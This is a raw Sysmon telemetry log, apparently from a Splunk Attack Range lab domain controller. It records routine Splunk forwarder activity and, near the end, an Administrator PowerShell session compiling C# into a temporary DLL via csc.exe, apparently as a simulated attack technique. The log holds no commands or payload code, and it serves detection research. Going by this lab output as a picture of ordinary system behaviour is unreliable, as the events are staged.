21:09:14.945{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045116C:\Windows\system32\svchost.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:14.930{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CCF40759218BE898ADE05577604FCD2,SHA256=B4EE4FEB61AF2BC4EC63DDB5B38F6D89B91A6463DA452DC6A1DBE523C43A70EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:15.961{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B94ADB179597204694D35BFDF0D5A85C,SHA256=F05FFEC94A0D974C49C95D900A7612179083955533430FF87F6480D6C7563ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:16.977{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC40DE0E0206AD566047E279A9F25BFA,SHA256=0DF62618EFD30A93ADFA2E5D920F276C645F07BF99D576513492092AE3A76AA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:15.219{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61513-false10.0.1.12-8000- 23542300x800000000000000024659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:17.992{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=924D17AE635C027B0F0916692C7FE47E,SHA256=D1A368AAFBED9BE9388965E7595548E5B8B8AF085EBA103C3B4FBF12A6B08D02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:19.023{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A273E7D1BAA6EE11237ACE4D970E8304,SHA256=E4C1A888C5203C7010B2C4EACF4D08EE87ADB7102368ADA0D7120C6C6C4A2577,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:20.039{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=344A1652EF7DD42995ACADC42760391F,SHA256=A494EDE3A9615172E550146CC09847ADAEDB58714A44AB1F075FF78C78D0474B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:20.281{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61514-false10.0.1.12-8000- 23542300x800000000000000024662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:21.039{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F020336CCDF7C278E1D95DC991A209B,SHA256=DE787E7BD7E7AB9652F28870337AB229AEE95F9055019A237D20089B521992C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:22.039{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1374657F148CEB324692B54B962BA524,SHA256=3498F56EFF05080B16D9693232A407508642FC96D21399A437C350C0B010EB83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:23.070{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D1964E923F75552B71700DBCB33DCD0,SHA256=3098C92E05C5751707F29F64725314B9E8DDCD45BA6A7BD5A18C9895E7047E7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:24.086{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AD86D100F3E03634416ECDCE2D8855D,SHA256=4C3B7275182E524D2A096B0895B15BDC59375FE5033F6A226109CCC978DB9BF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:25.101{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=448B93DB9EA52D81493B94F77E4E602B,SHA256=2EF9B2DA1CFD74178F8651C4CD8E904D37DEAA29B9D50A09B8A69F140576F37C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:26.195{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=248B62149141432D15BD9D78027BF03E,SHA256=58A29691D8F4EFC65A13F4F19D1FCF5376765375EF6C8F377D9DF9400DF0BDD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:26.117{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E6764EA6B47C81C0250895B8FCB5350,SHA256=DE160C36B4519B72F8B316E4A5AD64CCD16138136FEB210F137BA195D7B730F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:26.250{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61515-false10.0.1.12-8000- 23542300x800000000000000024670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:27.117{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D7D4FF8EE1C72841BEFCE0D66DF1E45,SHA256=78662BDF92B54FADC77D40172941B6053216CA6A8EAE12A20CDE5161C4C8DC0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:28.148{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E21275741975DAA3BA8C91EF41312C97,SHA256=7FA42A7526A71EBB3DF2FE5CD2C089E8E89E227CA463EBEF69D519169F61E9CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:29.195{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F50B77CF21FABBD8D4D42F800EDE2DFB,SHA256=B2E52A1A172D3AD99876487098AFFCBBF7DE53CD60A63E9F2AE22A833827BA4C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000024675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:09:30.474{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d76874-0x0ed196ae) 23542300x800000000000000024674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:30.226{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53D491D7A43E59430C5E234D4386CB8D,SHA256=F8823AE6674F70663A62E8D53C0C374F69C19706066F16DCD1FB602664A7EB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:31.256{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF9E63EF82FA3866E3E2EA80E0799148,SHA256=AF53265E141BA67DA812C74E66E12C2372BBAE577E1987E4FFD0794BDA38CF9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:32.287{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC3D14598314E1ABB67ED261C4F4DF87,SHA256=8CACBD757EC3AE200DE2CB3627C9661CA1F0A19325EABD85BA51C1ABF8A8892D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:33.334{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D08F00F9C0E13779B1A80CC1B64EB5B,SHA256=E6BCD8021AC8AC7A9A5105C8C23411A2054730DE40267C5D8FF6E64402ED2944,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:32.185{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61516-false10.0.1.12-8000- 23542300x800000000000000024679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:34.334{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ED929901ECC02A58B2127F3CEE89F14,SHA256=B9688C876188EC6801AD86C85BE54DC681F737781D4112AB18B68745D22AB35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:35.349{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1E6091C9D4F063711ED0BD0A57A83D,SHA256=8E0EB3C3618E74142884D122E1534E0C9BBF7F775233A86CCF65798B7B7EF18A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:36.349{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F9AAB3D69E098713FC0A44BA4C732FC,SHA256=839FB53B014F440E04C4B84EAF63857744A8CB11A2474509B1C0B7908E6FFF3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:37.381{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C15E31BA6354D5802B8502255D32B4FF,SHA256=5A057AED385B18739123354A3B0D92F49849779D3CA8945D3BE57163BEF6C228,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:37.216{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61517-false10.0.1.12-8000- 23542300x800000000000000024684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:38.396{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B66158C0BD6ADA79163FFEC9EC9CF525,SHA256=8033D8AC62B4E2F1CC021875AA5DF60BA1102AF1E11C391D9A3AF71D6EC1D5EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:39.396{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=972B25F9C07CF769DD274B352A192008,SHA256=8586D6249A8D4E85D7010561A3311E954CD06EE809D5666DD758BDDA29914AEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:39.224{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:40.412{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75D41C3A6A501BC86CF18956ED6BBCA3,SHA256=9ECD9E990FF726A1793C9B3D5933FF1CCE62E14369137420A4CCA84B87DFD6D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:41.427{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A55581860681C1ED900311B51B2CD32,SHA256=AECD93EF6FEADA2A48ECF44135286776F254941090BBA33E21808A48A81E7F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:42.443{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A420E2564C94992A09DC21F2D6742F1,SHA256=FD366E5073DAF5212724ECB6E03704ECD5A2C152C9F7D445C8E4FCF654602FA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:42.084{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=35E377A46E04E97E096CE5CE94748F8B,SHA256=DB7E3F76F7F2922591B13BFB7DDE0CA4F130721258DEE42E792EEDCDBC4CDA8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:39.263{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61518-false10.0.1.12-8089- 354300x800000000000000024694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:42.232{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61519-false10.0.1.12-8000- 23542300x800000000000000024693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:43.443{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DC692454468B53535CDE6997D81730,SHA256=8D5BFEFEEA1C096361615218EB3E77AEF73100F09D0489BDC0F962CF08BC96E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:44.443{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C60F0F7BB037B02E177DF50AE9C9D28,SHA256=8414ED85D437331B64FC7C67E09109AD0D7EB7DD208BA3EFB466A419106868F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:45.490{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FFE4E83F9A896E37589100F5C4CF0B2,SHA256=2015EE45EB6B01E3F0D16CFFB84491B0DDF1EC33F105B6F672A7EF5982193F4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:46.521{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AA2326DB856EC35E0B294FBFBC46E9,SHA256=F813FC89259BF50A20FC89BEC5DF9E9C65E5D63C599CC29FA43D780F5C07B96F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:47.552{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D431512ABFBCA968A85AD0E4B7A318AD,SHA256=8EA69884FA8778734D86E34460D8A944D8F3E0D6B247D62B4637838143D8A95F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.802{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=331F3060041DD33717D2EE8DDE1D126B,SHA256=D5DF11349D52B5D18D0B9C65F7E5D326210CA58DF472042EA6F9F4C110E821A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.802{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=90385A998E9EC7F7962A61573B4AE618,SHA256=9DB4BF769EF77B503C9D6E6C9FC4C461F6C9B126AC7D47B5E3D422E7B23E0569,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.740{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.cmdlineMD5=15400A20582AF3D33E875FD3E37B0C09,SHA256=7C9D0E01294AD3E22C350F6B50745A389ABE789A9931E3F2E2A0FCDCEDAFDC94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.740{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.0.csMD5=10E9ABF0FAE68083CD0F74B09AFF5337,SHA256=D5A895B2362348B06CF4EEC1C6C912F9BA19E882023309237AA479EDC6E9834E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.740{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.dllMD5=37C3055ADBEA32350315F1B5B49E18A9,SHA256=B80C1F71AFAB183EBCB99B7FA1EAB467F04A9AB4309EBAF345118AD125167F56,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.740{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.outMD5=12107309D183C6F73A24249AE41FB78A,SHA256=83BA32E34FDBCFC2B92B5FBA4EEC3E2D2A5A807E67E1833A724E7EFA6B07B7E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.724{4DB9351A-A31C-60D3-2706-00000000CF01}6500ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\CSC96C2CDA38C574F06AECFADFACA9F7F46.TMPMD5=3B74CA40B3960D4C59FD542A930932AF,SHA256=FCA316E4A528ECE5C4E1DF65F798EA27704C14F253A215D4BA041C8981B3C2DF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:09:48.724{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.dll2021-06-23 21:09:48.617 23542300x800000000000000024735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 